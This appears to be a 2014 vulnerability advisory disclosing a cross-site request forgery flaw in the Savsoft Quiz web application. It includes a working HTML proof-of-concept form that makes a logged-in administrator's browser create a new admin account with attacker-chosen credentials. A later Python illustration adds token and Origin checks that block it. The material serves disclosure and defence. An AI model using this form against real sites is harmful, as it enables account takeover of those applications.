Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability

2014.02.25
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

[+] Author: TUNISIAN CYBER
[+] Exploit Title: Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability
[+] Date: 24-02-2014
[+] Category: WebApp
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-352
[+] Vendor: http://savsoftquiz.com/web/buy-now/
[+] Friendly Sites: na3il.com, th3-creative.com

1. OVERVIEW:
Savsoft Quiz suffers from a Cross-Site Request Forgery (Add Admin) vulnerability: the user-creation action (index.php/user_data/insert_user) accepts a POST submitted from a third-party page, as the proof of concept below shows.

2. Version: All

3. Background:
Savsoft Quiz is a PHP-based web application for creating and managing online quizzes, tests and exams on your own web server or hosting: http://savsoftquiz.com/web/buy-now/

4. Proof Of Concept:

<html>
<body>
<form method="POST" name="form0" action="http://savsoftquiz.com/quizdemo/index.php/user_data/insert_user">
  <input type="hidden" name="username" value="miuter12"/>
  <input type="hidden" name="first_name" value="TUNISIAN"/>
  <input type="hidden" name="last_name" value="CYBER"/>
  <input type="hidden" name="user_email" value="g4k@hotmail.es"/>
  <input type="hidden" name="user_password" value="p@assw0rd"/>
  <input type="hidden" name="confirm_password" value="p@assw0rd"/>
  <input type="hidden" name="user_credit" value="blank"/>
  <input type="hidden" name="user_group" value="group1"/>
  <input type="submit" value="Click ME!"/>
</form>
</body>
</html>

5. Solution(s): n/a

6. TIME-LINE:
2014-02-22: Vulnerability was discovered.
2014-02-22: Contact with vendor.
2014-02-23: No reply.
2014-02-24: Vulnerability released.

7. Greetings: Xmax-tn, Xtech-set, N43il, Sec4ver, E4A Members
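The defensive counterpart, added here as an illustration and not part of the advisory or of Savsoft Quiz's own code: a server-side check combining a per-session synchronizer token with Origin/Referer validation, applied to the same insert_user fields the proof of concept posts. The session store, the handler, SITE_ORIGIN and the attacker origin are assumed stand-ins.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical stand-ins for the application's session store and its
# insert_user handler; the real Savsoft Quiz code is not reproduced here.
SITE_ORIGIN = "http://savsoftquiz.com"  # assumed deployment origin

def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the logged-in admin's session."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token

def origin_allowed(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is our site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # neither header present: treat as untrusted
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN

def insert_user(session: dict, headers: dict, form: dict) -> tuple:
    """Hardened add-user action: reject forged requests before doing any work."""
    if not origin_allowed(headers):
        return 403, "cross-site request rejected"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    if form.get("user_password") != form.get("confirm_password"):
        return 400, "passwords do not match"
    return 200, f"user {form['username']} created in {form['user_group']}"

# Constructed requests for the two cases.
ADMIN_SESSION: dict = {}
LEGIT_TOKEN = issue_csrf_token(ADMIN_SESSION)

# 1. The advisory's scenario: the form is submitted from an attacker-controlled
#    page, so the browser attaches the admin's cookies but a foreign Origin and no token.
FORGED_HEADERS = {"Origin": "http://attacker.example"}  # constructed origin
FORGED_FORM = {"username": "miuter12", "first_name": "TUNISIAN", "last_name": "CYBER",
               "user_email": "g4k@hotmail.es", "user_password": "p@assw0rd",
               "confirm_password": "p@assw0rd", "user_credit": "blank", "user_group": "group1"}

# 2. The same fields posted by the admin from the site's own form, carrying the token.
LEGIT_HEADERS = {"Origin": SITE_ORIGIN}
LEGIT_FORM = dict(FORGED_FORM, csrf_token=LEGIT_TOKEN)
```

Calling insert_user with the forged request returns 403, while the same fields sent from the site's own page with a valid token return 200.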


Copyright 2024, cxsecurity.com